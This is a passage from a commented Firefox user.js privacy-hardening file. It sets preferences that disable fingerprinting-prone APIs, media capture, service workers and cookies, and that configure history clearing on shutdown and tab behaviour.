https://developer.mozilla.org/en-US/docs/Web/API/WEBGL_debug_renderer_info user_pref("webgl.enable-debug-renderer-info", false); // 2012: two more webgl preferences (FF51+) user_pref("webgl.dxgl.enabled", false); user_pref("webgl.enable-webgl2", false); // 2021: disable speech recognition user_pref("media.webspeech.recognition.enable", false); user_pref("media.webspeech.synth.enabled", false); // 2022: disable screensharing user_pref("media.getusermedia.screensharing.enabled", false); user_pref("media.getusermedia.screensharing.allowed_domains", ""); user_pref("media.getusermedia.screensharing.allow_on_old_platforms", false); user_pref("media.getusermedia.browser.enabled", false); user_pref("media.getusermedia.audiocapture.enabled", false); // 2023: disable camera stuff user_pref("camera.control.face_detection.enabled", false); // 2024: enable/disable MSE (Media Source Extensions) // http://www.ghacks.net/2014/05/10/enable-media-source-extensions-firefox/ user_pref("media.mediasource.enabled", false); user_pref("media.mediasource.mp4.enabled", false); user_pref("media.mediasource.webm.audio.enabled", false); user_pref("media.mediasource.webm.enabled", false); // 2025: enable/disable various media types - end user personal choice // WARNING: this is the author´s settings, choose your own user_pref("media.mp4.enabled", false); user_pref("media.flac.enabled", false); // (FF51+) user_pref("media.ogg.enabled", false); user_pref("media.ogg.flac.enabled", false); // (FF51+) user_pref("media.opus.enabled", false); user_pref("media.raw.enabled", false); user_pref("media.wave.enabled", false); user_pref("media.webm.enabled", false); user_pref("media.wmf.enabled", false); // https://www.youtube.com/html5 - for the two H.264 entries // 2026: disable canvas capture stream // https://developer.mozilla.org/en-US/docs/Web/API/HTMLCanvasElement/captureStream user_pref("canvas.capturestream.enabled", false); // 2027: disable camera image capture // https://trac.torproject.org/projects/tor/ticket/16339 user_pref("dom.imagecapture.enabled", false); // 2028: disable offscreen canvas // https://developer.mozilla.org/en-US/docs/Web/API/OffscreenCanvas user_pref("gfx.offscreencanvas.enabled", false); /*** 2200: UI MEDDLING see http://kb.mozillazine.org/Prevent_websites_from_disabling_new_window_features ***/ // 2201: disable website control over right click context menu // WARNING: This will break some sites eg Dropbox, Google Docs? gmail? user_pref("dom.event.contextmenu.enabled", false); // 2202: UI SPOOFING: disable scripts hiding or disabling the following on new windows user_pref("dom.disable_window_open_feature.location", true); user_pref("dom.disable_window_open_feature.menubar", true); user_pref("dom.disable_window_open_feature.resizable", true); user_pref("dom.disable_window_open_feature.status", true); user_pref("dom.disable_window_open_feature.toolbar", true); // 2203: POPUP windows - prevent or allow javascript UI meddling user_pref("dom.disable_window_flip", true); // window z-order user_pref("dom.disable_window_move_resize", true); user_pref("dom.disable_window_open_feature.close", true); user_pref("dom.disable_window_open_feature.minimizable", true); user_pref("dom.disable_window_open_feature.personalbar", true); // bookmarks toolbar user_pref("dom.disable_window_open_feature.titlebar", true); user_pref("dom.disable_window_status_change", true); user_pref("dom.allow_scripts_to_close_windows", false); // 2204: disable links opening in a new window // https://trac.torproject.org/projects/tor/ticket/9881 // test url: https://people.torproject.org/~gk/misc/entire_desktop.html // You can still right click a link and select open in a new window // This is to stop malicious window sizes and screen res leaks etc in conjunction // with 2203 dom.disable_window_move_resize=true | 2418 full-screen-api.enabled=false // user_pref("browser.link.open_newwindow.restriction", 0); /*** 2300: SERVICE WORKERS ***/ // 2301: disable workers API and service workers API // https://developer.mozilla.org/en-US/docs/Web/API/Worker // https://developer.mozilla.org/en-US/docs/Web/API/ServiceWorker_API // http://www.ghacks.net/2016/03/02/manage-service-workers-in-firefox-and-chrome/ // WARNING: WILL break sites as this gains traction: eg mega.nz requires workers user_pref("dom.workers.enabled", false); user_pref("dom.serviceWorkers.enabled", false); // 2302: disable service workers cache and cache storage user_pref("dom.caches.enabled", false); // 2303: disable push notifications (FF44+) [requires serviceWorkers to be enabled] // web apps can receive messages pushed to them from a server, whether or // not the web app is in the foreground, or even currently loaded // https://developer.mozilla.org/en/docs/Web/API/Push_API // WARNING: may affect social media sites like Twitter user_pref("dom.push.enabled", false); user_pref("dom.push.connection.enabled", false); user_pref("dom.push.serverURL", ""); user_pref("dom.push.userAgentID", ""); // 2304: disable web/push notifications // https://developer.mozilla.org/en-US/docs/Web/API/notification // NOTE: you can still override individual domains under site permissions (FF44+) // WARNING: may affect social media sites like Twitter user_pref("dom.webnotifications.enabled", false); user_pref("dom.webnotifications.serviceworker.enabled", false); /*** 2400: DOM &JAVASCRIPT ***/ // 2402: disable website access to clipboard events/content // http://www.ghacks.net/2014/01/08/block-websites-reading-modifying-clipboard-contents-firefox/ // WARNING: This will break some sites functionality such as pasting into Facebook // this applies to onCut, onCopy, onPaste events - i.e is you have to interact with // the website for it to look at the clipboard user_pref("dom.event.clipboardevents.enabled", false); // 2403: disable clipboard commands (cut/copy) from "non-priviledged" content // this disables document.execCommand("cut"/"copy") to protect your clipboard // https://bugzilla.mozilla.org/show_bug.cgi?id=1170911 user_pref("dom.allow_cut_copy", false); // (hidden pref) // 2404: disable JS storing data permanently // If you block indexedDB but would like a toggle button, try the following add-on // https://addons.mozilla.org/en-US/firefox/addon/disable-indexeddb/ // This setting WAS under about:permissions>All Sites>Maintain Offline Storage // NOTE: about:permissions is no longer available since FF46 but you can still override // individual domains: use info icon in urlbar etc or right click on a web page>view page info // WARNING: If set as false (disabled), this WILL break some [old] add-ons and DOES break // a lot of sites´ functionality. Applies to websites, add-ons and session data. user_pref("dom.indexedDB.enabled", false); // 2405: https://wiki.mozilla.org/WebAPI/Security/WebTelephony user_pref("dom.telephony.enabled", false); // 2410: disable User Timing API // https://trac.torproject.org/projects/tor/ticket/16336 user_pref("dom.enable_user_timing", false); // 2411: disable resource/navigation timing user_pref("dom.enable_resource_timing", false); // 2412: disable timing attacks - javascript performance fingerprinting // https://wiki.mozilla.org/Security/Reviews/Firefox/NavigationTimingAPI user_pref("dom.enable_performance", false); // 2414: disable shaking the screen user_pref("dom.vibrator.enabled", false); // 2415: max popups from a single non-click event - default is 20! user_pref("dom.popup_maximum", 3); // 2415b: limit events that can cause a popup // default is "change click dblclick mouseup notificationclick reset submit touchend" // WARNING: Author killed all methods but does this with Popup Blocker Ultimate // in Strict mode with whitelist. Or you can allow all but blacklist. Either way, // Popup Blocker Ultimate overwrites this pref with a blank (or allows everything!). // http://kb.mozillazine.org/Dom.popup_allowed_events user_pref("dom.popup_allowed_events", "click dblclick"); // 2416: disable idle observation user_pref("dom.idle-observers-api.enabled", false); // 2418: disable full-screen API // This setting WAS under about:permissions>All Sites>Fullscreen // NOTE: about:permissions is no longer available since FF46 but you can still override // individual domains: use info icon in urlbar etc or right click on a web page>view page info // set to false=block, set to true=ask user_pref("full-screen-api.enabled", false); // 2420: disable support for asm.js ( http://asmjs.org/ ) // https://www.mozilla.org/en-US/security/advisories/mfsa2015-29/ // https://www.mozilla.org/en-US/security/advisories/mfsa2015-50/ // https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2712 user_pref("javascript.options.asmjs", false); // 2421: in addition to 2420, these settings will help harden JS against exploits such as CVE-2015-0817 // https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0817 // WARNING: causes the odd site issue and there is also a performance loss // Update: Jan-2017: commented out for now, as performance gains outweigh extra security user_pref("javascript.options.ion", false); user_pref("javascript.options.baselinejit", false); // 2425: disable ArchiveAPI i.e reading content of archives, such as zip files, directly // in the browser, through DOM file objects. Default is false. user_pref("dom.archivereader.enabled", false); // 2450: force FF to tell you if a website asks to store data for offline use // https://support.mozilla.org/en-US/questions/1098540 // https://bugzilla.mozilla.org/show_bug.cgi?id=959985 user_pref("offline-apps.allow_by_default", false); // Options>Advanced>Network>Tell me when a website asks to store data for offline use user_pref("browser.offline-apps.notify", true); // change size of warning quota for offline cache (default 51200) // Offline cache is only used in rare cases to store data locally. FF will store small amounts // (default < 50MB) of data in the offline (application) cache without asking for permission. // user_pref("offline-apps.quota.warn", 51200); /*** 2500: HARDWARE FINGERPRINTING ***/ // 2501: disable gamepad API - USB device ID enumeration // https://trac.torproject.org/projects/tor/ticket/13023 user_pref("dom.gamepad.enabled", false); // 2502: disable Battery Status API. Initially a Linux issue (high precision readout) that is now fixed. // However, it is still another metric for fingerprinting, used to raise entropy. // eg: do you have a battery or not, current charging status, charge level, times remaining etc // http://techcrunch.com/2015/08/04/battery-attributes-can-be-used-to-track-web-users/ // https://bugzilla.mozilla.org/show_bug.cgi?id=1124127 // https://www.w3.org/TR/battery-status/ // https://www.theguardian.com/technology/2016/aug/02/battery-status-indicators-tracking-online // NOTE: From FF52+ Battery Status API is only available in chrome/privileged code. // https://bugzilla.mozilla.org/show_bug.cgi?id=1313580 user_pref("dom.battery.enabled", false); // 2503: disable giving away network info // eg bluetooth, cellular, ethernet, wifi, wimax, other, mixed, unknown, none // https://developer.mozilla.org/en-US/docs/Web/API/Network_Information_API // https://wicg.github.io/netinfo/ // https://bugzilla.mozilla.org/show_bug.cgi?id=960426 user_pref("dom.netinfo.enabled", false); // 2504: disable virtual reality devices // https://developer.mozilla.org/en-US/docs/Web/API/WebVR_API user_pref("dom.vr.enabled", false); user_pref("dom.vr.oculus.enabled", false); user_pref("dom.vr.osvr.enabled", false); // (FF49+) user_pref("dom.vr.openvr.enabled", false); // (FF51+) // 2505: disable media device enumeration (FF29+) // NOTE: media.peerconnection.enabled should also be set to false (see 2001) // https://wiki.mozilla.org/Media/getUserMedia // https://developer.mozilla.org/en-US/docs/Web/API/MediaDevices/enumerateDevices user_pref("media.navigator.enabled", false); // 2506: disable video statistics - JS performance fingerprinting // https://trac.torproject.org/projects/tor/ticket/15757 user_pref("media.video_stats.enabled", false); // 2507: disable keyboard fingerprinting (FF38+) (physical keyboards) // The Keyboard API allows tracking the "read parameter" of pressed keys in forms on // web pages. These parameters vary between types of keyboard layouts such as QWERTY, // AZERTY, Dvorak, and between various languages, eg German vs English. // WARNING: Don´t use if Android + physical keyboard // UPDATE: This MAY be incorporated better into the Tor Uplift project (see 2699) // https://developer.mozilla.org/en-US/docs/Web/API/KeyboardEvent/code // https://www.privacy-handbuch.de/handbuch_21v.htm user_pref("dom.keyboardevent.code.enabled", false); user_pref("dom.beforeAfterKeyboardEvent.enabled", false); user_pref("dom.keyboardevent.dispatch_during_composition", false); // 2508: disable graphics fingerprinting (the loss of hardware acceleration is negligible) // These prefs are under Options>Advanced>General>Use hardware acceleration when available // NOTE: changing this option changes BOTH these preferences // https://wiki.mozilla.org/Platform/GFX/HardwareAcceleration // WARNING: This changes text rendering (fonts will look different) // If you watch a lot of video, this will impact performance user_pref("gfx.direct2d.disabled", true); user_pref("layers.acceleration.disabled", true); // 2509: disable touch events // https://developer.mozilla.org/en-US/docs/Web/API/Touch_events // https://trac.torproject.org/projects/tor/ticket/10286 // fingerprinting attack vector - leaks screen res &actual screen coordinates // WARNING: If you use touch eg Win8/10 Metro/Smartphone reset this to default user_pref("dom.w3c_touch_events.enabled", 0); // 2510: disable Web Audio API (FF51+) // https://bugzilla.mozilla.org/show_bug.cgi?id=1288359 user_pref("dom.webaudio.enabled", false); // 2511: disable MediaDevices change detection (FF51+) (enabled by default starting FF52+) // https://developer.mozilla.org/en-US/docs/Web/Events/devicechange // https://developer.mozilla.org/en-US/docs/Web/API/MediaDevices/ondevicechange user_pref("media.ondevicechange.enabled", false); /*** 2600: MISC - LEAKS / FINGERPRINTING / PRIVACY / SECURITY ***/ // 2601: disable sending additional analytics to web servers // https://developer.mozilla.org/en-US/docs/Web/API/navigator.sendBeacon user_pref("beacon.enabled", false); // 2602: CIS 2.3.2 disable downloading on desktop user_pref("browser.download.folderList", 2); // 2603: always ask the user where to download - enforce user interaction for security user_pref("browser.download.useDownloadDir", false); // 2604: https://bugzil.la/238789#c19 user_pref("browser.helperApps.deleteTempFileOnExit", true); // 2605: don´t integrate activity into windows recent documents user_pref("browser.download.manager.addToRecentDocs", false); // 2606: disable hiding mime types (Options>Applications) not associated with a plugin user_pref("browser.download.hide_plugins_without_extensions", false); // 2607: disable page thumbnail collection // look in profile/thumbnails directory - you may want to clean that out user_pref("browser.pagethumbnails.capturing_disabled", true); // (hidden pref) // 2608: disable JAR from opening Unsafe File Types user_pref("network.jar.open-unsafe-types", false); // 2611: disable WebIDE to prevent remote debugging and add-on downloads // https://trac.torproject.org/projects/tor/ticket/16222 user_pref("devtools.webide.autoinstallADBHelper", false); user_pref("devtools.webide.autoinstallFxdtAdapters", false); user_pref("devtools.debugger.remote-enabled", false); user_pref("devtools.webide.enabled", false); // 2612: disable SimpleServiceDiscovery - which can bypass proxy settings - eg Roku // https://trac.torproject.org/projects/tor/ticket/16222 user_pref("browser.casting.enabled", false); user_pref("gfx.layerscope.enabled", false); // 2613: disable device sensor API - fingerprinting vector // https://trac.torproject.org/projects/tor/ticket/15758 user_pref("device.sensors.enabled", false); // 2614: disable SPDY as it can contain identifiers // https://www.torproject.org/projects/torbrowser/design/#identifier-linkability (no. 10) user_pref("network.http.spdy.enabled", false); user_pref("network.http.spdy.enabled.deps", false); // 2615: disable http2 for now as well user_pref("network.http.spdy.enabled.http2", false); // 2617: disable pdf.js as an option to preview PDFs within Firefox // see mime-types under Options>Applications) - EXPLOIT risk // Enabling this (set to true) will change your option most likely to "Ask" or "Open with // some external pdf reader". This does NOT necessarily prevent pdf.js being used via // other means, it only removes the option. I think this should be left at default (false). // 1. It won´t stop JS bypassing it. 2. Depending on external pdf viewers there is just as // much risk or more (acrobat). 3. Mozilla are very quick to patch these sorts of exploits, // they treat them as severe/critical and 4. for convenience user_pref("pdfjs.disabled", true); // 2618: when using SOCKS have the proxy server do the DNS lookup - dns leak issue // http://kb.mozillazine.org/Network.proxy.socks_remote_dns // https://trac.torproject.org/projects/tor/wiki/doc/TorifyHOWTO/WebBrowsers // eg in TOR, this stops your local DNS server from knowing your Tor destination // as a remote Tor node will handle the DNS request user_pref("network.proxy.socks_remote_dns", false); // 2619: limit HTTP redirects (this does not control redirects with HTML meta tags or JS) // WARNING: a low setting of 5 or under will probably break some sites (eg gmail logins) // To control HTML Meta tag and JS redirects, use an add-on (eg NoRedirect). Default is 20 // // [SOLVED by Gooken, 03.04.2020] // Belonging error-message could be for less than 6: "Firefox has detected that the server is redirecting the request for this address in a way that will never complete." // user_pref("network.http.redirection-limit", 20); // 2620: disable middle mouse click opening links from clipboard // https://trac.torproject.org/projects/tor/ticket/10089 // http://kb.mozillazine.org/Middlemouse.contentLoadURL user_pref("middlemouse.contentLoadURL", false); // 2621: disable IPv6 (included for knowledge ONLY - not recommended) // This is all about covert channels such as MAC addresses being included/abused in the // IPv6 protocol for tracking. If you want to mask your IP address, this is not the way // to do it. It´s 2016, IPv6 is here. Here are some old links // 2010: https://www.christopher-parsons.com/ipv6-and-the-future-of-privacy/ // 2011: https://iapp.org/news/a/2011-09-09-facing-the-privacy-implications-of-ipv6 // 2012: http://www.zdnet.com/article/security-versus-privacy-with-ipv6-deployment/ // NOTE: It is a myth that disabling IPv6 will speed up your internet connection // http://www.howtogeek.com/195062/no-disabling-ipv6-probably-wont-speed-up-your-internet-connection // user_pref("network.dns.disableIPv6", true); // user_pref("network.http.fast-fallback-to-IPv4", true); // 2622: ensure you have a security delay when installing add-ons (milliseconds) // default=1000, This also covers the delay in "Save" on downloading files. // http://kb.mozillazine.org/Disable_extension_install_delay_-_Firefox // http://www.squarefree.com/2004/07/01/race-conditions-in-security-dialogs/ user_pref("security.dialog_enable_delay", 1000); // 2623: ensure Strict File Origin Policy on local files // The default is true. Included for completeness // http://kb.mozillazine.org/Security.fileuri.strict_origin_policy user_pref("security.fileuri.strict_origin_policy", true); // 2624: enforce Subresource Integrity (SRI) (FF43+) // The default is true. Included for completeness // https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity // https://wiki.mozilla.org/Security/Subresource_Integrity user_pref("security.sri.enable", true); // 2625: Applications [non Tor protocol] SHOULD generate an error // upon the use of .onion and SHOULD NOT perform a DNS lookup. // https://bugzilla.mozilla.org/show_bug.cgi?id=1228457 user_pref("network.dns.blockDotOnion", true); // 2626: strip optional user agent token, default is false, included for completeness // https://developer.mozilla.org/en-US/docs/Web/HTTP/Gecko_user_agent_string_reference user_pref("general.useragent.compatMode.firefox", false); // 2627: Spoof default UA &relevant (navigator) parts (also see 0204 for UA language) // NOTE: may be better handled by an extension (eg whitelisitng), try not to clash with it // NOTE: this is NOT a complete solution (feature detection, some navigator objects leak, resource URI etc) // AIM: match latest TBB settings: Windows, ESR, OS etc // WARNING: If you do not understand fingerprinting then don´t use this section // test: http://browserspy.dk/browser.php // http://browserspy.dk/showprop.php (for buildID) // http://browserspy.dk/useragent.php // ==start== // A: navigator.userAgent leaks in JS, setting this also seems to break UA extension whitelisting // user_pref("general.useragent.override", "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0"); // (hidden pref) // B: navigator.buildID (see gecko.buildID in about:config) reveals build time // down to the second which defeats user agent spoofing and can compromise OS etc // https://bugzilla.mozilla.org/show_bug.cgi?id=583181 user_pref("general.buildID.override", "20100101"); // (hidden pref) // C: navigator.appName user_pref("general.appname.override", "Netscape"); // (hidden pref) // D: navigator.appVersion user_pref("general.appversion.override", "5.0 (Windows)"); // (hidden pref) // E: navigator.platform leaks in JS user_pref("general.platform.override", "Win64"); // (hidden pref) // F: navigator.oscpu user_pref("general.oscpu.override", "Windows NT 6.1"); // (hidden pref) // 2628: disable UITour backend so there is no chance that a remote page can use it user_pref("browser.uitour.enabled", false); user_pref("browser.uitour.url", ""); // 2629: disable remote JAR files being opened, regardless of content type // https://bugzilla.mozilla.org/show_bug.cgi?id=1215235 user_pref("network.jar.block-remote-files", true); // 2650: start the browser in e10s mode (48+) // After restarting the browser, you can check whether it´s enabled by visiting // about:support and checking that "Multiprocess Windows" = 1 // use force-enable and extensions.e10sblocksenabling if you have add-ons // user_pref("browser.tabs.remote.autostart", true); // user_pref("browser.tabs.remote.autostart.2", true); // (FF49+) // user_pref("browser.tabs.remote.force-enable", true); // (hidden pref) // user_pref("extensions.e10sBlocksEnabling", false); // 2651: control e10s number of container processes // http://www.ghacks.net/2016/02/15/change-how-many-processes-multi-process-firefox-uses/ // https://bugzilla.mozilla.org/show_bug.cgi?id=1207306 // user_pref("dom.ipc.processCount", 4); // 2652: enable console shim warnings for extensions that don´t have the flag // ´multiprocessCompatible´ set to true user_pref("dom.ipc.shims.enabledWarnings", true); // 2660: enforce separate content process for file: // URLs (FF53+?) // https://bugzilla.mozilla.org/show_bug.cgi?id=1147911 // http://www.ghacks.net/2016/11/27/firefox-53-exclusive-content-process-for-local-files/ user_pref("browser.tabs.remote.separateFileUriProcess", true); // 2662: disable "open with" in download dialog (FF50+) // This is very useful to enable when the browser is sandboxed (e.g. via AppArmor) // in such a way that it is forbidden to run external applications. // WARNING: This may interfere with some users´ workflow or methods // https://bugzilla.mozilla.org/show_bug.cgi?id=1281959 user_pref("browser.download.forbid_open_with", true); // 2663: disable MathML (FF51+) // https://bugzilla.mozilla.org/show_bug.cgi?id=1173199 // test: http://browserspy.dk/mathml.php user_pref("mathml.disabled", true); // 2664: disable DeviceStorage API // https://wiki.mozilla.org/WebAPI/DeviceStorageAPI user_pref("device.storage.enabled", false); // 2665: sanitize webchannel whitelist user_pref("webchannel.allowObject.urlWhitelist", ""); // 2666: disable HTTP Alternative Services // http://www.ghacks.net/2015/08/18/a-comprehensive-list-of-firefox-privacy-and-security-settings/#comment-3970881 user_pref("network.http.altsvc.enabled", false); user_pref("network.http.altsvc.oe", false); // 2667: disable various developer tools in browser context // Devtools>Advanced Settings>Enable browser chrome and add-on debugging toolboxes // http://github.com/pyllyukko/user.js/issues/179#issuecomment-246468676 user_pref("devtools.chrome.enabled", false); // 2668: lock down allowed extension directories // https://mike.kaply.com/2012/02/21/understanding-add-on-scopes/ // archived: http://archive.is/DYjAM user_pref("extensions.enabledScopes", 1); // (hidden pref) user_pref("extensions.autoDisableScopes", 15); // 2669: strip paths when sending URLs to PAC scripts (FF51+) // CVE-2017-5384: Information disclosure via Proxy Auto-Config (PAC) // https://bugzilla.mozilla.org/show_bug.cgi?id=1255474 user_pref("network.proxy.autoconfig_url.include_path", false); // 2670: close bypassing of CSP via image mime types (FF51+) // https://bugzilla.mozilla.org/show_bug.cgi?id=1288361 user_pref("security.block_script_with_wrong_mime", true); // 2671: disable SVG (FF53+) // https://bugzilla.mozilla.org/show_bug.cgi?id=1216893 user_pref("svg.disabled", true); /*** 2698: FIRST PARTY ISOLATION (PFI) ***/ // 2698a: enable first party isolation pref and OriginAttribute (FF51+) // WARNING: breaks lots of cross-domain logins and site funtionality until perfected // https://bugzilla.mozilla.org/show_bug.cgi?id=1260931 // 2698b: this also isolates OCSP requests by first party domain // https://bugzilla.mozilla.org/show_bug.cgi?id=1264562 // user_pref("privacy.firstparty.isolate", true); /*** 2699: TOR UPLIFT: privacy.resistFingerprinting This preference will be used as a generic switch for a wide range of items. This section will attempt to list all the ramifications and Mozilla tickets ***/ // 2699a: limit window.screen &CSS media queries providing large amounts of identifiable info. // POC: http://ip-check.info/?lang=en (screen, usable screen, and browser window will match) // https://bugzilla.mozilla.org/show_bug.cgi?id=418986 // NOTE: does not cover everything yet - https://bugzilla.mozilla.org/show_bug.cgi?id=1216800 // NOTE: this will probably make your values pretty unique until you resize or snap the // inner window width + height into standard/common resolutions (mine is at 1366x768) // To set a size, open a XUL (chrome) page (such as about:config) which is at 100% zoom, hit // Shift+F4 to open the scratchpad, type window.resizeTo(1366,768), hit Ctrl+R to run. Test // your window size, do some math, resize to allow for all the non inner window elements // test: http://browserspy.dk/screen.php // Common resolutions: http://www.rapidtables.com/web/dev/screen-resolution-statistics.htm // 2699b: spoof screen orientation // https://bugzilla.mozilla.org/show_bug.cgi?id=1281949 // 2699c: hide the contents of navigator.plugins and navigator.mimeTypes (FF50+) // https://bugzilla.mozilla.org/show_bug.cgi?id=1281963 user_pref("privacy.resistFingerprinting", true); // (hidden pref) /*** 2700: COOKIES &DOM STORAGE ***/ // 2701: disable cookies on all sites // you can set exceptions under site permissions or use an extension (eg Cookie Controller) // 0=allow all 1=allow same host 2=disallow all 3=allow 3rd party if it already set a cookie // user_pref("network.cookie.cookieBehavior", 2); // 2702: ensure that third-party cookies (if enabled, see above pref) are session-only // https://feeding.cloud.geek.nz/posts/tweaking-cookies-for-privacy-in-firefox/ // http://kb.mozillazine.org/Network.cookie.thirdparty.sessionOnly // user_pref("network.cookie.thirdparty.sessionOnly", true); // 2703: set cookie lifetime policy // 0=until they expire (default), 2=until you close Firefox, 3=for n days (see next pref) // If you use custom settings for History in Options, this is the setting under // Privacy>Accept cookies from sites>Keep until they expire/I close Firefox> // user_pref("network.cookie.lifetimePolicy", 0); // 2704: set cookie lifetime in days (see above pref) - default is 90 days // user_pref("network.cookie.lifetime.days", 90); // 2705: disable dom storage // WARNING: this will break a LOT of sites´ functionality. // You are better off using an extension for more granular control // user_pref("dom.storage.enabled", false); // 2706: disable Storage API (FF51+) which gives sites´ code the ability to find out how much space // they can use, how much they are already using, and even control whether or not they need to // be alerted before the user agent disposes of site data in order to make room for other things. // https://developer.mozilla.org/en-US/docs/Web/API/StorageManager // https://developer.mozilla.org/en-US/docs/Web/API/Storage_API user_pref("dom.storageManager.enabled", false); // 2707: clear localStorage and UUID when a WebExtension is uninstalled // NOTE: both preferences must be the same // https://developer.mozilla.org/en-US/Add-ons/WebExtensions/API/storage/local // https://bugzilla.mozilla.org/show_bug.cgi?id=1213990 user_pref("extensions.webextensions.keepStorageOnUninstall", false); user_pref("extensions.webextensions.keepUuidOnUninstall", false); /*** 2800: SHUTDOWN ***/ // 2802: enable FF to clear stuff on close // This setting is under Options>Privacy>Clear history when Firefox closes user_pref("privacy.sanitize.sanitizeOnShutdown", true); // 2803: what to clear on shutdown // These settings are under Options>Privacy>Clear history when Firefox closes>Settings // These are the settings of the author of this user.js, chose your own user_pref("privacy.clearOnShutdown.cache", true); user_pref("privacy.clearOnShutdown.cookies", true); user_pref("privacy.clearOnShutdown.downloads", true); user_pref("privacy.clearOnShutdown.formdata", true); user_pref("privacy.clearOnShutdown.history", true); user_pref("privacy.clearOnShutdown.offlineApps", true); user_pref("privacy.clearOnShutdown.sessions", true); // active logins user_pref("privacy.clearOnShutdown.siteSettings", true); // 2803a: include all open windows/tabs when you shutdown // user_pref("privacy.clearOnShutdown.openWindows", true); // 2804: (to match above) - auto selection of items to delete with Ctrl-Shift-Del user_pref("privacy.cpd.cache", true); user_pref("privacy.cpd.cookies", false); user_pref("privacy.cpd.downloads", true); user_pref("privacy.cpd.formdata", true); user_pref("privacy.cpd.history", true); user_pref("privacy.cpd.offlineApps", true); user_pref("privacy.cpd.passwords", false); user_pref("privacy.cpd.sessions", false); user_pref("privacy.cpd.siteSettings", false); // 2804a: include all open windows/tabs when you run clear recent history // user_pref("privacy.cpd.openWindows", true); // 2805: reset default ´Time range to clear´ for ´clear recent history´ (see 2804 above) // Firefox remembers your last choice. This will reset the value when you start FF. // 0=everything 1=last hour, 2=last 2 hours, 3=last 4 hours, 4=today user_pref("privacy.sanitize.timeSpan", 0); /*** 3000: PERSONAL SETTINGS Settings that are handy to migrate and/or are not in the Options interface. Users can put their own non-security/privacy/fingerprinting/tracking stuff here ***/ // 3001: disable annoying warnings user_pref("general.warnOnAboutConfig", false); user_pref("browser.tabs.warnOnClose", false); user_pref("browser.tabs.warnOnCloseOtherTabs", false); user_pref("browser.tabs.warnOnOpen", false); // 3001a: disable warning when a domain requests full screen // https://developer.mozilla.org/en-US/docs/Web/Guide/API/DOM/Using_full_screen_mode // user_pref("full-screen-api.warning.delay", 0); // user_pref("full-screen-api.warning.timeout", 0); // 3002: disable closing browser with last tab user_pref("browser.tabs.closeWindowWithLastTab", false); // 3004: disable backspace (0 = previous page, 1 = scroll up, 2 = do nothing) user_pref("browser.backspace_action", 2); // 3005: disable autocopy default (use extensions autocopy 2 © plain text 2) user_pref("clipboard.autocopy", false); // 3007: open new windows in a new tab instead // This setting is under Options>General>Tabs // 1=current window, 2=new window, 3=most recent window user_pref("browser.link.open_newwindow", 3); // 3008: disable "Do you really want to leave this site?" popups // https://support.mozilla.org/en-US/questions/1043508 user_pref("dom.disable_beforeunload", true); // 3009: turn on APZ (Async Pan/Zoom) - requires e10s // http://www.ghacks.net/2015/07/28/scrolling-in-firefox-to-get-a-lot-better-thanks-to-apz/ // user_pref("layers.async-pan-zoom.enabled", true); // 3010: enable ctrl-tab previews user_pref("browser.ctrlTab.previews", true); // 3011: don´t open "page/selection source" in a tab. The window used instead is cleaner // and easier to use and move around (eg developers/multi-screen). user_pref("view_source.tab", false); // 3012: spellchecking: 0=none, 1-multi-line controls, 2=multi-line &single-line controls user_pref("layout.spellcheckDefault", 1); // 3013: disable automatic "Work Offline" status // https://bugzilla.mozilla.org/show_bug.cgi?id=620472 // https://developer.mozilla.org/en-US/docs/Online_and_offline_events user_pref("network.manage-offline-status", false); // 3015: disable tab animation, speed things up a little user_pref("browser.tabs.animate", false); // 3016: disable fullscreeen animation. Test using F11. // Animation is smother but is annoyingly slow, while no animation can be startling user_pref("browser.fullscreen.animate", false); // 3017: submenu in milliseconds. 0=instant while a small number allows // a mouse pass over menu items without any submenus alarmingly shooting out user_pref("ui.submenuDelay", 75); // (hidden pref) // 3018: maximum number of daily bookmark backups to keep (default is 15) user_pref("browser.bookmarks.max_backups", 2); // 3020: FYI: urlbar click behaviour (with defaults) user_pref("browser.urlbar.clickSelectsAll", true); user_pref("browser.urlbar.doubleClickSelectsAll", false); // 3021: FYI: tab behaviours (with defaults) // open links in a new tab immediately to the right of parent tab, not far right user_pref("browser.tabs.insertRelatedAfterCurrent", true); // switch to the parent tab (if it has one) on close, rather than to the adjacent right tab if // it exists or to the adjacent left tab if it doesn´t. NOTE: requires browser.link.open_newwindow // set to 3 (see pref 3007). NOTE: does not apply to middle-click or Ctrl-clicking links. user_pref("browser.tabs.selectOwnerOnClose", true); // Options>General>When I open a link in a new tab, switch to it immediately // default is unchecked = DON´T switch to it = true user_pref("browser.tabs.loadInBackground", true); // set behavior of pages normally meant to open in a new window (such as target="_blank" // or from an external program), but that have instead been loaded in a new tab. // true: load the new tab in the background, leaving focus on the current tab // false: load the new tab in the foreground, taking the focus from the current tab. user_pref("browser.tabs.loadDivertedInBackground", false); // 3022: hide recently bookmarked items (you still have the original bookmarks) (FF49+) user_pref("browser.bookmarks.showRecentlyBookmarked", false); // 3023: disable automigrate, current default is false but may change (FF49+) // need more info, but lock down for now user_pref("browser.migrate.automigrate.enabled", false); // END: internal custom pref to test for syntax errors /*** 9996: PALEMOON SPECIFIC ( https://www.palemoon.org/ ) Full list maintained by Moonchild: https://forum.palemoon.org/viewtopic.php?f=24&t=3357 If you have issues or questions about any of these, please use the palemoon forums NOTE: This section is no longer maintained [after version 10] ***/ // 9996-1: (v25.6+) disable canvas fingerprinting // user_pref("canvas.poisondata", true); // 9996-2: (v25.2+) control HSTS // If editing this in about:config PM needs to be fully closed and then restarted // NOTE: This is a trade-off between privacy vs security. HSTS was designed to increase // security to stop MiTM attacks but can also be misused as a fingerprinting vector, by // scrapping previously visited sites. Recommended: security over privacy. Your choice. // user_pref("network.stricttransportsecurity.enabled", true); // 9996-3: (v25.0+) controls whether to ignore an expired state of stapled OCSP responses // If set to true, breaks with RFC6066 (like Firefox) and ignores the fact that stapled // OCSP responses may be expired. If false (the default) aborts the connection. // user_pref("security.ssl.allow_unsafe_ocsp_response", false); // 9996-4: (v25.6+) Controls whether to completely ignore "autocomplete=off" on login fields // user_pref("signon.ignoreAutocomplete", false); // 9996-5: (v26.0+) read Moonchild´s description on the palemoon forum thread linked above // user_pref("dom.disable_beforeunload", true); /*** 9997: DEPRECATED Personally confirmed by resetting as well as via documentation and DXR searches. NOTE: numbers may get re-used ***/ // 2607: (23+) disable page thumbnails, it was around v23, not 100% sure when // this pref was replaced with 